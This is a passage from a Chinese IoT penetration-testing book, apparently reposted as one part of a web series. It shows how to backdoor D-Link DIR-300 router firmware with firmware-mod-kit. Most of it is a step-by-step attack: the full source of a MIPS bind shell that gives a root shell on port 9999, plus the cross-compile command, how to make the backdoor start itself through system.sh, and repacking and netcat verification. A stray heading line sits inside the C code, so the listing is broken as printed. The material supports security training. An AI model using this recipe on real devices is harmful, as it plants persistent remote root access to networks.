编者按：本文节选自华章网络空间安全技术丛书《物联网渗透测试》一书中的部分章节。

使用firmware-mod-kit（FMK）在固件中添加后门

在漏洞利用过程中，经常需要用到的一种方法就是篡改固件。也就是从固件中提取文件系统，对其内容进行修改，然后再将其重新打包成新的固件，随后攻击者可以将这个新打包的固件刷进设备。

准备工作

固件篡改的过程会用到工具FMK，该工具由Jeremy Collake和Craig Heffner开发。FMK不仅可以利用Binwalk或其他工具从固件中提取出文件系统，还具有将篡改后的文件系统重新打包成新固件的功能。

FMK可以从https://github.com/brianpow/firmware-mod-kit/下载，如果读者之前从GitHub中克隆了FAT代码，那么该工具应该已经存在于读者的系统中了。下载完该工具后，接下来我们就可以找一个固件一试身手了。出于简单起见，同时让本书的读者在无须投入资金购买硬件的情况下也能够复现以下步骤，我们主要以能够采用FAT进行仿真的固件为例进行介绍。

测试流程

篡改固件的步骤如下：

1）在本例中我们使用的固件来自D-Link DIR-300路由器。在这里我们使用FMK目录下的extract-firmware.sh脚本从固件中提取文件系统，而未使用Binwalk。操作命令如图1所示。

./extract-firmware.sh Dlink_firmware.bin

图　1

提取出固件后，脚本会生成一个新目录，其中包括rootfs、image_part和logs等文件夹。由于攻击者的目的大多是添加后门和修改固件，因此这里我们只关心rootfs文件夹。

rootfs文件夹中包含了固件中的整套文件系统。而我们所要做的工作就是在固件中添加后门，然后找到固件启动后自动调用后门的方法。

2）首先查看固件所基于的架构。对固件中任一文件执行readelf命令就可以查看其架构，以BusyBox文件为例，命令执行结果如图2所示。

图　2

3）正如我们从图2中看到的，固件是基于MIPS小端架构的。这意味着我们需要开发符合MIPS小端架构的后门并进行编译。下面是我们将要使用的后门源码，该后门由Osanda Malith开发编写：

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define SERVER_PORT  9999
 /* CC-BY: Osanda Malith Jayathissa (@OsandaMalith)
  * Bind Shell using Fork for my TP-Link mr3020 router running busybox
  * Arch : MIPS
  * mips-linux-gnu-gcc mybindshell.c -o mybindshell -static -EB -march=24kc
  */
int main() {
   int serverfd, clientfd, server_pid, i = 0;
   char *banner = "[~] Welcome to @OsandaMalith's Bind Shell\n";
   char *args[] = { "/bin/busybox", "sh", (char *) 0 };
   Analyzing and Exploiting Firmware
   struct sockaddr_in server, client;
   socklen_t len;

   server.sin_family = AF_INET;
   server.sin_port = htons(SERVER_PORT);
   server.sin_addr.s_addr = INADDR_ANY;

   serverfd = socket(AF_INET, SOCK_STREAM, 0);
   bind(serverfd, (struct sockaddr *)&server, sizeof(server));
   listen(serverfd, 1);

    while (1) {
         len = sizeof(struct sockaddr);
         clientfd = accept(serverfd, (struct sockaddr *)&client, &len);
        server_pid = fork();
        if (server_pid) {
         write(clientfd, banner,  strlen(banner));
           for(; i <3 /*u*/; i++) dup2(clientfd, i);
           execve("/bin/busybox", args, (char *) 0);
           close(clientfd);
         } close(clientfd);
    } return 0;
}

代码写好后，我们就可以使用针对MIPSEL架构的Buildroot，并使用该Buildroot构建的交叉编译器编译代码。这里不对安装配置Buildroot的过程进行过多介绍，因为这个过程非常简单，并且在Buildroot的说明文档中已经进行了详细说明。

4）为MIPSEL架构创建了交叉编译器后，我们接下来将bindshell.c编译为能够植入文件系统的二进制文件bindshell：

./mipsel-buildroot-linux-uclibc-gcc bindshell.c -static -o
bindshell

下一步是在文件系统中寻找可以放置该二进制文件的地方，以及如何在启动过程中将其设置为自启动。这里我们的思路是分析在启动过程中自动调用的脚本，看看是否能够实现自启动。

5）在文件系统中，我们可以在etc/templates/目录中放入后门的二进制文件，然后在system.sh脚本中调用该二进制文件，其中system.sh脚本位于/etc/scripts/目录下，脚本编写如图3所示。

图　3

6）接下来使用build-firmware.sh脚本将修改后的文件系统重新打包为新的固件，打包过程如图4所示。

图　4

执行完成后，会在目录firmware-name/中生成新的固件，新固件名为new-firmware.bin。

7）此时就创建完成了新的固件镜像，我们可以将新固件复制到FAT目录中，并通过仿真来验证新添加的后门是否能够正常运行。这里同之前固件仿真的步骤相同。操作步骤如图5所示。

图　5

如图5所示，固件仿真时获得的IP地址为192.168.0.1，此时可以尝试访问该地址。但我们更关注在固件中添加的后门bindshell是否已经成功启动。

8）现在尝试运行Netcat连接目标IP的9999端口，检查后门是否成功启动，如图6所示。

图　6

根据执行结果，可以看到我们已经对固件进行了修改并成功植入了后门，因此此时成功获得了设备中具有root权限的shell。而获得拥有root权限的shell之后，用户还可以修改设备的其他配置，或者将其作为跳板远程访问其他植入恶意固件的设备。

测试分析

固件篡改的功能强大，对于攻击者而言是梦寐以求的目标。这是因为，如果能够实现对固件的篡改，那么攻击者就能够实现绕过保护机制、移除安全防护措施等操作。而利用本章介绍的FMK等工具，攻击者可以很容易地将自己开发的恶意软件或后门植入到任意IoT设备固件中，这样攻击者就可以在全球任何地方通过后门访问IoT设备了。

正是由于固件篡改在攻击者手中具有如此强大的威力，所以如果能够对固件进行签名和校验值验证，那么对于防止恶意修改固件的攻击而言将具有非常重要的意义。

图书简介：https://item.jd.com/12623610.html

相关阅读

物联网渗透测试（一）：简介

物联网渗透测试（二）：IoT 中的 Web 应用

物联网渗透测试（三）：IoT 中的移动应用

物联网渗透测试（四）：IoT 渗透测试环境的部署

物联网渗透测试（五）：威胁建模概念简介

物联网渗透测试（六）：IoT 设备威胁建模剖析

物联网渗透测试（七）：固件威胁建模

物联网渗透测试（八）：IoT Web 应用威胁建模

物联网渗透测试（九）：IoT 移动应用威胁建模

物联网渗透测试（十）：固件分析方法

物联网渗透测试（十一）：固件分析流程

物联网渗透测试（十二）：MIPS 架构下的漏洞利用

创作场景

物联网渗透测试（十三）：使用 firmware-mod-kit(FMK) 在固件中添加后门